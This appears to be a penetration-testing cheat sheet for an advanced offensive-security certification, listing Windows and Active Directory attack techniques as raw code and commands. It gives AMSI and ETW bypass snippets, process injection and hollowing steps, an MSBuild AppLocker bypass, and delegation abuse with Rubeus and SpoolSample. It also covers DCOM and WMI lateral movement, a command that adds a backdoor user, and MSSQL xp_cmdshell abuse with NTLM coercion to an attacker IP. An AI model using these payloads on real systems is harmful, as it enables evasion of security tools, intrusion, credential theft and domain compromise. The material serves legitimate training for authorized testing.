Advanced evasion, custom exploits and AD attacks; a continuation of OSCP.
Official Page
# PowerShell — Reflection patch
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Memory patch (C#)
var amsi = LoadLibrary("amsi.dll");
var func = GetProcAddress(amsi, "AmsiScanBuffer");
// Patch first byte with 0xC3 (RET)
# Obfuscated version
$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');
$b=$a.GetField('amsiInitFailed','NonPublic,Static');
$b.SetValue($null,$true)
# Patch EtwEventWrite to return immediately
$EtwEventWrite = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(
(Get-ProcAddress ntdll.dll EtwEventWrite), (Get-DelegateType @([IntPtr],[Int32],[IntPtr],[Int32],[IntPtr]) ([Int32]))
)
# Replace first bytes with 0xC3
# PowerShell ETW disable
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null), 0)
[DllImport("kernel32.dll")] static extern IntPtr OpenProcess(int dwAccess, bool bInherit, int pid);
[DllImport("kernel32.dll")] static extern IntPtr VirtualAllocEx(IntPtr hProc, IntPtr addr, uint size, uint type, uint protect);
[DllImport("kernel32.dll")] static extern bool WriteProcessMemory(IntPtr hProc, IntPtr addr, byte[] buf, uint size, out uint written);
[DllImport("kernel32.dll")] static extern IntPtr CreateRemoteThread(IntPtr hProc, IntPtr attr, uint size, IntPtr func, IntPtr param, uint flags, IntPtr id);
// 1. OpenProcess(0x001F0FFF, false, pid)
// 2. VirtualAllocEx(hProc, 0, (uint)shellcode.Length, 0x3000, 0x40)
// 3. WriteProcessMemory(hProc, addr, shellcode, ...)
// 4. CreateRemoteThread(hProc, 0, 0, addr, 0, 0, 0)
# 1. Create suspended process (svchost.exe, explorer.exe)
CreateProcess(null, "C:\\Windows\\System32\\svchost.exe", ..., CREATE_SUSPENDED, ...)
# 2. Read PEB to get image base
ZwQueryInformationProcess → PROCESS_BASIC_INFORMATION
# 3. Unmap original image
ZwUnmapViewOfSection(hProc, imageBase)
# 4. Allocate memory at original base
VirtualAllocEx(hProc, imageBase, payloadSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
# 5. Write payload headers and sections
WriteProcessMemory per section
# 6. Set new entry point in context
GetThreadContext → SetThreadContext (EAX/RAX = EP)
ResumeThread
# Check AppLocker rules
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
# CLM check
$ExecutionContext.SessionState.LanguageMode # ConstrainedLanguage means CLM is enforced; FullLanguage means it is not
# Bypass using MSBuild
using System.Diagnostics; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;
// Inline MSBuild task: MSBuild.exe loads this type from the project file (see the Run line below) and invokes Execute().
public class ClassTask : Task {
// Execute() starts cmd.exe with the given command line and always reports success (returns true).
// The Process object returned by Process.Start is discarded rather than disposed.
// Defender's note: MSBuild.exe spawning cmd.exe is the observable parent/child signal for this pattern.
public override bool Execute() { Process.Start("cmd.exe", "/c whoami > C:\\out.txt"); return true; }
}
# Run: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xml
# Unconstrained delegation — find hosts
Get-DomainComputer -Unconstrained | select dnshostname
# Coerce the DC to authenticate to the unconstrained host (SpoolService / printer-bug trick), which delivers its TGT there
.\SpoolSample.exe DC01 unconstrained_host
# Then extract TGT from memory
.\Rubeus.exe monitor /monitorinterval:5 /targetuser:DC01$
# Constrained delegation — find accounts
Get-DomainUser -TrustedToAuth | select samaccountname,msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | select dnshostname,msds-allowedtodelegateto
# S4U2Self + S4U2Proxy
.\Rubeus.exe s4u /user:svc_constrained /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target /ptt
# MMC20.Application
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "target"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c whoami > C:\out.txt", "7")
# ShellWindows
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID([Guid]"9BA05972-F6A8-11CF-A442-00A0C90A8F39", "target"))
$item = $com.Item()
$item.Document.Application.ShellExecute("cmd.exe", "/c whoami > C:\out.txt", "C:\Windows\System32", $null, 0)
# wmiexec.py
wmiexec.py domain/Administrator:pass@target
# PowerShell WMI
Invoke-WMIMethod -ComputerName target -Class Win32_Process -Name Create -ArgumentList "cmd /c whoami > C:\out.txt"
# PsExec-style remote process creation via WMI (Win32_Process.Create)
$wmi = [wmiclass]"\\target\root\cimv2:win32_process"
$wmi.Create("cmd.exe /c net user hacker P@ss123 /add")
# Enumerate MSSQL instances
Get-SQLInstanceDomain -Verbose
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
# Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';
# UNC path coercion for NTLMv2
EXEC xp_dirtree '\\10.10.14.x\share';
# Capture with Responder
# Linked server enum
SELECT * FROM sys.servers;
EXEC ('SELECT @@servername') AT [LINKED_SERVER];
EXEC ('xp_cmdshell ''whoami''') AT [LINKED_SERVER];